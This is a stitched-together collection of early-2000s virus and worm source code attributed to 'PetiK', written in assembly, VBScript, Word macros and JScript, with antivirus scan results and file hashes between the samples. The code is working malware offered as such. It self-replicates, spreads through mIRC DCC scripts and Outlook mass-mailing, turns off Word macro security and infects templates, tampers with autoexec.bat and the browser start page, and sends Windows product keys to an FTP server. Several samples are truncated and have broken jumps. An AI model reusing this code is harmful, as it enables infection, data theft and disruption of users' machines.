000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,001h,0E6h,003h
DATTAILLE equ $-datd
.code
DEBUT:
VERIF: push offset regDisp
push offset regResu
push 00h
push 0F003Fh
push 00h
push 00h ; HKCU\Software\[PetiK] exist ?
push 00h
push offset CLE
push HKEY_CURRNET_USER
call RegCreateKeyExA
push [regResu]
call RegCloseKey
cmp [regDisp],1
jne EMAIL ; YES => EMAIL
push [RegHandle]
call RegCloseKey
NORTON: push offset RegHandle
push 001F0000h
push 00h
push offset CLE_NOR
push HKEY_LOCAL_MACHINE
call RegOpenKeyExA
test eax,eax
jnz FIN
push offset BufferSize
push offset Buffer
push offset ValueType
push 00h ; Search the "InstallDir" of Norton
push offset Value
push RegHandle
call RegQueryValueExA
push [RegHandle]
call RegCloseKey
push 5000
call Sleep ; Wait 5 seconds
push FILE_ATTRIBUTE_READONLY
push offset Buffer
call SetFileAttributesA ; Attribute read only for the file
MESSAGE:push 40h
push offset TITRE
push offset TEXTE
push 00h
call MessageBoxA
end DEBUT
File Mustard.exe received on 05.16.2009 17:59:52 (CET)
Additional information
File size: 7168 bytes
MD5...: 2aae09e21d35fd56f7aa0f603dcb6151
SHA1..: 4fbe3b2758bdb50ea45bb4593f074239c30bdd5d
<--
Name : HTML.Embargo
Author : PetiK
Language : HTML/VBS
-->
<embargo>
<HTML><HEAD><TITLE>WinHelp</TITLE></HEAD>
<BODY bgColor=#ffffff>
<SCRIPT Language=VBScript>
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set original=document.body.createTextRange
Set copie=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\WinHelp.htm")
copie.WriteLine "<embargo>"
copie.WriteLine "<HTML><HEAD><TITLE>WinHelp</TITLE></HEAD>"
copie.WriteLine "<BODY bgColor=#ffffff>"
copie.WriteLine original.htmltext
copie.WriteLine "</BODY></HTML>"
copie.Close()
reg=ws.RegRead("HKLM\Software\HTML.Embargo\")
If reg <> "c parti" Then
Set auto=fso.OpenTextFile("C:\autoexec.bat", 1, False, False)
tout=auto.ReadAll
Set nouveau= fso.CreateTextFile("C:\autoexec.bat", True, False)
nouveau.Write(tout)
nouveau.WriteLine ""
nouveau.WriteLine "@echo off"
nouveau.WriteLine ":embargo"
nouveau.WriteLine "cls"
nouveau.WriteLine "echo This is the signature of my new virus"
nouveau.WriteLine "echo."
nouveau.WriteLine "echo HTML.Embargo by PetiK"
nouveau.WriteLine "echo Made In France (c)2001"
nouveau.WriteLine "pause"
nouveau.WriteLine "goto embargo"
nouveau.Close()
ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page",fso.GetSpecialFolder(0)&"\WinHelp.htm"
ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\FullScreen","yes"
ws.RegWrite "HKLM\Software\HTML.Embargo\","c parti"
End If
reg=ws.RegRead("HKLM\Software\HTML.Embargo\mirc")
If reg <> "c parti" Then
PFD=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If dossier = "" Then
If fso.FileExists("c:\mirc\mirc.ini") Then dossier = "c:\mirc"
If fso.FileExists("c:\mirc32\mirc.ini") Then dossier = "c:\mirc32"
If fso.FileExists(PFD & "\mirc\mirc.ini") Then dossier = PFD & "\mirc"
If fso.FileExists(PFD & "\mirc32\mirc.ini") Then dossier = PFD & "\mirc32"
End If
If dossier <> "" Then
Set script = fso.CreateTextFile(dossier & "\script.ini", True)
script.WriteLine "[script]"
script.WriteLine "n0=on 1:JOIN:#:{"
script.WriteLine "n1= /if ( $nick == &me ) (halt)"
script.WriteLine "n2= ./dcc send $nick " & fso.GetSpecialFolder(0)&"\WinHelp.htm"
script.WriteLine "n3=}"
ws.RegWrite "HKLM\Software\HTML.Embargo\mirc","c parti"
End If
Additional information
File size: 4085 bytes
MD5...: 4ec0004fb7f700df736ae4d3c2c22919
SHA1..: 464dec7db3865638af142f5e8929fcd49e5af667
' Worm Name : W97M.Maya.A
' Author : PetiK
' Language : VBA Word
' Date : May 29th – June 1st 2001
' Size : 33792 – 33280 (with change) bytes
'
'
'
' Change the properties of the documents. If not exist the Value “W97M.Maya” in
' the key HKLM\Software\, the worm copy itself to C:\Windows\Maya.doc. It creates
' the “C:\Maya” directory with a TXT file and a acript file to infect mIRC
' channel. After, it spreads with Microsoft Outlook.
' Subject : “Hi man, it’s ” + user name
' Body : “This is the new net Story”
' “It ‘s great”
' Attachment : Maya.doc
' On 5th of the month, when the document is close, a message box appears.
' When Visual Basic is active, an other message box appears and the worm
' add a value in the “RunKey” of regedit to disabled the mouse.
Sub AutoOpen()
On Error Resume Next
With Dialogs(wdDialogFileSummaryInfo)
.Author = "PetiK"
.Title = "W97M.Maya"
.Comments = "To my best GirlFriend"
.Keywords = "Maya, Bzzbzz, to grow"
.Execute
End With
ActiveDocument.SaveAs FileName:="C:\Windows\Maya.doc"
ActiveDocument.Saved = True
FileSystem.MkDir "C:\Maya"
Open "C:\Maya\hello.txt" For Output As #1
Print #1, "Le 29 mai 2001 à Munster"
Print #1, "This is my first W97M.Outlook.Worm"
Print #1, "Its name is W97M.Maya"
Close #1
Open "C:\Maya\script.ini" For Output As #1
Print #1, "n0=on 1:JOIN:#:{"
Print #1, "n1= /if ( $nick == $me ) { halt }"
Print #1, "n2= /.dcc send $nick C:\Windows\Maya.doc"
Print #1, "n3=}"
Close #1
FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc32\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc32\script.ini"
FileSystem.Kill "C:\Maya\script.ini"
End Sub
Sub AutoClose()
If Day(Now) = 5 Then
MsgBox "Coded by PetiK (c)2001", vbInformation, "W97M.Maya"
End If
End Sub
Sub ViewVBCode()
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "MayAttack") =
"rundll32 mouse,disable"
MsgBox "Curiosity is bad" + vbCr + vbCr + "With her small size" + vbCr + "Maya is alwayas
there", vbCritical, "W97M.Maya"
ShowVisualBasicEditor = True
End Sub
File Maya.doc received on 05.16.2009 17:59:46 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Melissa-based!IK
AhnLab-V3 5.0.0.2 2009.05.16 W97M/Unnamed
AntiVir 7.9.0.168 2009.05.15 W2000M/Ayam.A@mm
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord
Authentium 5.1.2.4 2009.05.16 W97M/Ayam.A@mm
Avast 4.8.1335.0 2009.05.15 MW97:Ayam family
AVG 8.5.0.336 2009.05.15 BAT/Generic
BitDefender 7.2 2009.05.16 W97M.Ayam.A@mm
CAT-QuickHeal 10.00 2009.05.15 W97M.Prilissa
ClamAV 0.94.1 2009.05.16 W97M.Ayam.A
Comodo 1157 2009.05.08 Virus.MSWord.Melissabased
DrWeb 5.0.0.12182 2009.05.16 X97M.Papa
eSafe 7.0.17.0 2009.05.14 O97M.GNsm
eTrust-Vet 31.6.6508 2009.05.16 W97M/Ayam.A:mm
F-Prot 4.4.4.56 2009.05.16 W97M/Ayam.A@mm
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Melissa-based
Fortinet 3.117.0.0 2009.05.16 W97M/Ayam.A@MM
GData 19 2009.05.16 W97M.Ayam.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Melissa-based
K7AntiVirus 7.10.737 2009.05.16 Macro.Melissa-based
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Melissa-based
McAfee 5616 2009.05.15 W97M/Generic@MM
McAfee+Artemis 5616 2009.05.15 W97M/Generic@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Ayam.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Ayam.A@mm
NOD32 4080 2009.05.15 W97M/Ayam.A
Norman 6.01.05 2009.05.16 W97M/Ayam.A
nProtect 2009.1.8.0 2009.05.16 W97M.Ayam.A@mm
Panda 10.0.0.14 2009.05.16 W97M/Maya.Worm
PCTools 4.4.2.0 2009.05.16 WORD.97.Maya.B
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Macro.Office.Melissa-based.aa
Sophos 4.41.0 2009.05.16 WM97/Munster-A
Sunbelt 3.2.1858.2 2009.05.16 Virus.MSWord.Melissa-based (v)
Symantec 1.4.4.12 2009.05.16 W97M.OutlookWorm.Gen
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Sin
TrendMicro 8.950.0.1092 2009.05.15 W97M_AYAM.A
VBA32 3.12.10.5 2009.05.16 Virus.X97M.Papa
ViRobot 2009.5.15.1737 2009.05.15 W97M.Ayam.A
VirusBuster 4.6.5.0 2009.05.16 WORD.97.Maya.B
Additional information
File size: 33280 bytes
MD5...: ebe499343061e49ea4f31639fc3a7e59
SHA1..: 89de7abdbdc3fc8764d481a49125b8a3cebf6f05
// Name : JS.Germinal.A@mm
// Author : PetiK
// Date : June 1st – 2nd 2001
// Language : JScript
// Size of infection : 2357 bytes
// Action : It infects all *.JS file in \WINDOWS, \WINDOWS\DESKTOP
// and \WINDOWS\SAMPLES\WSH folders.
// It creates a TXT file with information and send this to a ftp server.
// JS.Germinal.A@mm
var WS=WScript.CreateObject("WScript.Shell")
var fso=WScript.CreateObject("Scripting.FileSystemObject")
var win=fso.GetSpecialFolder(0)
var c=fso.OpenTextFile(WScript.ScriptFullName,1)
var virus=c.ReadAll()
var nom=WS.RegRead
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOwner")
var org=WS.RegRead
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOrganization")
var id=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductId")
var key=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductKey")
var ver=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Version")
var vernum=WS.RegRead
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\VersionNumber")
var txt=fso.CreateTextFile("C:\\"+nom+".txt",2)
txt.WriteLine ("Information de " + nom + " à " + org);
txt.WriteLine ("");
txt.WriteLine ("Numéro d'identification : " + id);
txt.WriteLine ("Numéro de la clé : " + key);
txt.WriteLine ("Version de windows : " + ver + " " + vernum);
txt.Close()
var drv=fso.CreateTextFile(win+"\\PetiK.drv",2)
drv.WriteLine ("open");
drv.WriteLine ("members.aol.com");
drv.WriteLine ("pentasm99");
drv.WriteLine ("ascii")
drv.WriteLine ("put C:\\"+nom+".txt");
drv.WriteLine ("bye");
drv.WriteLine ("exit");
drv.Close()
WS.Run ("command.com /c ftp.exe -i -v -s:"+win+"\\PetiK.drv")
Additional information
File size: 2357 bytes
MD5...: b90254895d6169a8d111a508e2638c51
SHA1..: 7669c66d338b4208536c32924bcab95996cf8c3e
' Name : W97M.Kodak
' Author : PetiK
' Date : June 5th 2001
' Size 3,030 bytes
'
' Macro AutoOpen : Create a “script.ini” file for mIRC. If the day is the 5th
' the virus display a Baloon Message. It copies itself to /Windows/Kodak.doc.
'
' Macro AutoClose : It alters the security in Word 9.0 and 10.0 (2000 and XP)
' It copies his code into the file “Kodak.vxd” and put it in the “NORMAL.DOT”.
' When a new file is create, the code of the macro is writes in this file.
' To avoid infect two times “NORMAL.DOT”, the virus adds the value :
' HKEY_LOCAL_MACHINE\Software\Microsoft\W97M.Kodak = CliClac
'
' Macro HelpAbout : Display an other Baloon Message
'
' Macro ViewVBCode : Display a Message Box and shoxs Visual Basic Editor
'
' Macro ToolsOptions and Security : Find yourself.
Sub AutoClose()
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> 1& Then
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") <> 1& Then
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
End If
If Dir("C:\Kodak.vxd", vbReadOnly) = "" Then
Open "C:\Kodak.vxd" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
K = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, K
Next i
Close #1
SetAttr "C:\Kodak.vxd", vbReadOnly
End If
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\",
"W97M.Kodak") <> "ClicClac" Then
NormalTemplate.VBProject.VBComponents.Import "C:\Kodak.vxd"
NormalTemplate.Save
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") =
"ClicClac"
End If
ActiveDocument.VBProject.VBComponents.Import "C:\Kodak.vxd"
ActiveDocument.Save
End Sub
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "Smile and cheese for the photo"
.Heading = "W97M.Kodak"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
End Sub
Sub ViewVBCode()
MsgBox "was coded by PetiK(c)2001", vbInformation, "W97M.Kodak"
ShowVisualBasicEditor = True
End Sub
Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub
Sub ToolsSecurity()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = True
Dialogs(wdDialogToolsSecurity).Show
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub
File Kodak.doc received on 05.16.2009 17:43:05 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Adok!IK
AhnLab-V3 5.0.0.2 2009.05.16 W97M/Adok
AntiVir 7.9.0.168 2009.05.15 W2000M/Petman.A
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord
Authentium 5.1.2.4 2009.05.16 W97M/Adok.A
Avast 4.8.1335.0 2009.05.15 MW97:Adok-A
AVG 8.5.0.336 2009.05.15 W97M/Ethan
BitDefender 7.2 2009.05.16 W97M.Kdk.A
CAT-QuickHeal 10.00 2009.05.15 W97M.ZMK.M
ClamAV 0.94.1 2009.05.16 WM.Psycho
Comodo 1157 2009.05.08 Virus.MSWord.Adok
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 O97M.GNcc
eTrust-Vet 31.6.6508 2009.05.16 W97M/Adok.A
F-Prot 4.4.4.56 2009.05.16 W97M/Adok.A
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Adok
Fortinet 3.117.0.0 2009.05.16 W97M/Adok.A
GData 19 2009.05.16 W97M.Kdk.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Adok
K7AntiVirus 7.10.737 2009.05.16 Macro.Adok
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Adok
McAfee 5616 2009.05.15 W97M/Generic
McAfee+Artemis 5616 2009.05.15 W97M/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Petman.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Adok.A
NOD32 4080 2009.05.15 W97M/Adok.A
Norman 6.01.05 2009.05.16 W97M/Adok.A
nProtect 2009.1.8.0 2009.05.16 W97M.Kdk.A
Panda 10.0.0.14 2009.05.16 W97M/Kodak.worm
PCTools 4.4.2.0 2009.05.16 WORD.97.Adok.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Macro.Word97.Adok
Sophos 4.41.0 2009.05.16 WM97/Adok-A
Sunbelt 3.2.1858.2 2009.05.16 W97M.Adok (v)
Symantec 1.4.4.12 2009.05.16 W97M.Adok.A
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_ABOTUS.A
VBA32 3.12.10.5 2009.05.16 Virus.W97M.Ethan
ViRobot 2009.5.15.1737 2009.05.15 W97M.Adok
VirusBuster 4.6.5.0 2009.05.16 WORD.97.Adok.A
Additional information
File size: 31232 bytes
MD5...: 84a74bcf024ac4779d20e2b667bc6da6
SHA1..: 99cbae9ae51381d5f7eb637b12d42e790f48db33
comment #
Name : I-Worm.Gamma (w32gammaworm)
Author : PetiK
Date : May 29th - June 9th
Size : 8704 bytes
Action : Check if the file is /WINDOWS/SYSTEM.SETUP.EXE. Whether it's not this file, it
will copies to /WINDOWS/SYSTEM.SETUP.EXE. It alters the run= line in the Win.ini file to
the name of the copy. It displays a message.
Otherwise, he create C:\gamma and copies it to C:\mirc, C:\mirc32, C:\progra~1\mirc or
C:\progra~1\mirc32. After, it creates C:\Data and put a file info.vbs. This file send a
message to gamma@multimania.com :
On the 5th, when the day is Wednesday, a message is displayed. When the user click on
"OK", the worm swap the buttons of the mouse.
The worms waits for an active Internet connection and tries to establish one by attemping
to www.symantec.com. When the connection is successful, it scans all *.*htm* file in
"Temporary Inetrnet Files" to find email adresses. When the worms finds it, it sends a
copy of him to the address :
With Regards,
Symantec Corporation (http://www.symantec.com)
Attachment : SETUP.EXE
#
.586p
.model flat,stdcall
include useful.inc
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn CreateFileMappingA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn FindClose:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn gethostbyname:PROC
extrn GetFileSize:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn lstrcat:PROC
extrn lstrcmp:PROC
extrn MAPILogoff:PROC
extrn MAPILogon:PROC
extrn MAPISendMail:PROC
extrn MapViewOfFile:PROC
extrn MessageBoxA:PROC
extrn RegCloseKey:PROC
extrn RegOpenKeyExA:PROC
extrn RegQueryValueExA:PROC
extrn SetCurrentDirectoryA:PROC
extrn Sleep:PROC
extrn SwapMouseButton:PROC
extrn UnmapViewOfFile:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn WritePrivateProfileStringA:PROC
.data
szComName db 50 dup (0)
szOrig db 50 dup (0)
szWinini db 50 dup (0)
szTif db 7Fh dup (0)
FileHandle dd ?
RegHandle dd ?
SrchHandle dd ?
octets dd ?
ValueType dd 0
mail_address db 128 dup (?)
MAPISession dd 0
DIR db "C:\Data",00h
information db "C:\Data\info.vbs",00h
infoexec db "wscript C:\Data\info.vbs",00h
mirc db "C:\gamma",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\progra~1\mirc\script.ini",00h
script4 db "C:\progra~1\mirc32\script.ini",00h
Copie db "\SETUP.EXE",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
TEXTE db "This file does not appear to be a Win32 valid file. ",00h
TITRE2 db "I-Worm.Gamma (c)2001",00h
TEXTE2 db "PetiK greets you",00h
symantec db "www.symantec.com",00h
tempnetfile db "\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",00h
Value db "Cache",00h
FICHIER db "*.*htm*",00h
CREATE_NEW equ 00000001h
CREATE_ALWAYS equ 00000002h
FILE_ATTRIBUTE_READONLY equ 00000001h
FILE_ATTRIBUTE_NORMAL equ 00000080h
FILE_MAP_READ equ 00000004h
FILE_SHARE_READ equ 00000001h
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
HKEY_USERS equ 80000003h
KEY_QUERY_VALUE equ 00000001h
KEY_SET_VALUE equ 00000002h
MAX_PATH equ 260
OPEN_EXISTING equ 00000003h
PAGE_READONLY equ 00000002h
REG_SZ equ 00000001h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>
time struc
LowDateTime dd ?
HighDateTime dd ?
time ends
win32 struc
FileAttributes dd ?
CreationTime time ?
LastAccessTime time ?
LastWriteTime time ?
FileSizeHifh dd ?
FileSizeLow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName dd MAX_PATH (?)
AlternativeFileName db 13 dup (?)
db 3 dup (?)
win32 ends
CHERCHE win32 <>
mircd: db "[script]",0dh,0ah
db ";Don't delete this file",0dh,0ah
db "n0=ON 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick "
szCopie db 50 dup (0)
db "",0dh,0ah
db "n3=}",0dh,0ah
MIRCTAILLE equ $-mircd
Email dd ?
dd offset Subject
dd offset Message
dd ?
dd offset DateS
dd ?
dd 2
dd offset MelFrom
dd 1
dd offset MelTo
dd 1
dd offset Attach
MelFrom dd ?
dd ?
dd offset MelFrom
dd offset sAddr
dd ?
dd ?
MelTo dd ?
dd 1
dd offset MelTo
dd offset mail_address
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset szOrig
dd ?
dd ?
Subject db "Virus/Worms Fix from Symantec Corporation (Norton Antivirus)",00h
Message db "Hi,",0dh,0ah,0dh,0ah
db "Symantec Corporation send you the last version of our tool Virus/Worms Fix. "
db "Here is the version 3.1 .",0dh,0ah
db "This tool detect, repair and protect users against Bloodhound.IRC.Worm, "
db "Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .",0dh,0ah,0dh,0ah
db 09h,09h,"With Regards,",0dh,0ah
db 09h,09h,"Symantec Corporation (http://www.symantec.com)",00h
DateS db "06/06/2001",00h
sAddr db "snd@symantec.com",00h
.code
DEBUT:
VERIF: push 00h
call GetModuleHandleA
push 50
push offset szOrig
push eax
call GetModuleFileNameA
push 50h
push offset szCopie
call GetSystemDirectoryA
push offset Copie
push offset szCopie
call lstrcat
WININI: push 50
push offset szWinini
call GetWindowsDirectoryA
push offset Winini
push offset szWinini
call lstrcat
push offset szWinini
push offset szCopie
push offset run
push offset windows
call WritePrivateProfileStringA
MESSAGE:push 1010h
push offset szOrig
push offset TEXTE
push 00h
call MessageBoxA
jmp FIN
push [RegHandle]
call RegCloseKey
END_S: popad
HTML: pushad
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push FILE_SHARE_READ
push GENERIC_READ
push offset CHERCHE.FileName
call CreateFileA
inc eax
je END_S
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
call CreateFileMappingA
test eax,eax
jz FERME1
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
call MapViewOfFile
test eax,eax
jz FERME2
xchg eax,esi
push 00h
push ebx
call GetFileSize
xchg eax,ecx
jecxz FERME3
jmp ls_s_m
end DEBUT
File Gamma.exe received on 05.16.2009 11:58:18 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/PetTick.8704
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.09
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Malware!d62f
Avast 4.8.1335.0 2009.05.15 Win32:Gamma
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.C@mm
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 Worm.Petik.AV.09
Comodo 1157 2009.05.08 Worm.Win32.Petik.C
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8704
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Mania
F-Prot 4.4.4.56 2009.05.15 W32/Malware!d62f
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.D@mm
GData 19 2009.05.16 Win32.Petik.C@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.09
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.C@mm
NOD32 4080 2009.05.15 Win32/Petik.C
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8704.A
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 DDoS/Petik.C
PCTools 4.4.2.0 2009.05.15 I-Worm.Gamma.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.g
Sophos 4.41.0 2009.05.16 W32/Gamma
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.D
VBA32 3.12.10.5 2009.05.16 OScope.Dialer.GMHA
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8704.A
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Gamma.A
Additional information
File size: 8704 bytes
MD5...: 997ae169da2f57e7e48e6862eb70223a
SHA1..: b7349d6e5c65551d1162597cf4871b0c8e04e6b1
comment #
Name : I-Worm.Winmine
Author : PetiK
Date : June 12th - June 15th
Size : 6656 bytes
Action : Check if the file is run from the SYSTEM folder. If so, it creates a file with
the name
"C:\ENVOIE_VBS.vbs" to spread with Outlook :
Subject : Is the work so hard ??
Body : Relax you with the last version of <Winmine>.
Attached : WINMINE.EXE
It chages the start page of Internet Explorer by
"http://perso.libertysurf.fr/dacruz/mayaindex.html"
If the current day is the 15th, it displays a message and swaps the buttons of the mouse.
After five minutes, the worms stops the computer.
Otherwise, it copies itself to SYSTEM folder, alters the load= line in WIN.INI file to
run when
the computer starts and displays a message box.
#
.586p
.model flat
.code
callx macro a
extrn a:proc
call a
endm
DEBUT:
VERIF: push 00h
callx GetModuleHandleA
push 50
push offset szOrig
push eax
callx GetModuleFileNameA
push 50h
push offset szCopie
callx GetSystemDirectoryA
push offset Copie
push offset szCopie
callx lstrcat
WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
push offset Winini
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
push offset load
push offset windows
callx WritePrivateProfileStringA
MESSAGE:push 1040h
push offset TITRE
push offset TEXTE
push 00h
callx MessageBoxA
jmp FIN
SEND: push 00h
push FILE_ATTRIBUTE_READONLY
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset vbssend
callx CreateFileA
cmp eax,-1
je GO
mov [FileHandle],eax
push 00h
push offset octets
push VBSTAILLE
push offset vbsd
push [FileHandle]
callx WriteFile
push [FileHandle]
callx CloseHandle
GO: push 01h
push offset onyva
callx WinExec
.data
szCopie db 50 dup (0)
szOrig db 50 dup (0)
szWinini db 50 dup (0)
FileHandle dd ?
octets dd ?
hdll dd ?
setvalue dd ?
Copie db "\WINMINE.EXE",00h
vbssend db "C:\ENVOIE_VBS.vbs",00h
onyva db "wscript C:\ENVOIE_VBS.vbs",00h
Winini db "\\WIN.INI",00h
load db "load",00h
windows db "windows",00h
TITRE db "Winmine - Microsoft Corporation (R)",00h
TEXTE db "The last update of the game ""Winmine"" written by Microsoft
Corporation",00h
TITRE2 db "I-Worm.Winmine",00h
TEXTE2 db "By PetiK (c)2001",00h
main_s db "Software\Microsoft\Internet Explorer\Main",00h
start_key db "Start Page",00h
start_page db "http://perso.libertysurf.fr/dacruz/mayaindex.html",00h
dllName db "SHLWAPI.dll",00h
FunctionName db "SHSetValueA",00h
wormname db "I-Worm.Winmine by PetiK",00h
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set A=CreateObject("Outlook.Application")',0dh,0ah
db 'Set B=A.GetNameSpace("MAPI")',0dh,0ah
db 'For Each C In B.AddressLists',0dh,0ah
db 'If C.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For D=1 To C.AddressEntries.count',0dh,0ah
db 'Set E=C.AddressEntries(D)',0dh,0ah
db 'Set F=A.CreateItem(0)',0dh,0ah
db 'F.To=E.Address',0dh,0ah
db 'F.Subject="Is the work so hard ??"',0dh,0ah
db 'F.Body="Relax you with the last version of <Winmine>."',0dh,0ah
db 'Set G=CreateObject("Scripting.FileSystemObject")',0dh,0ah
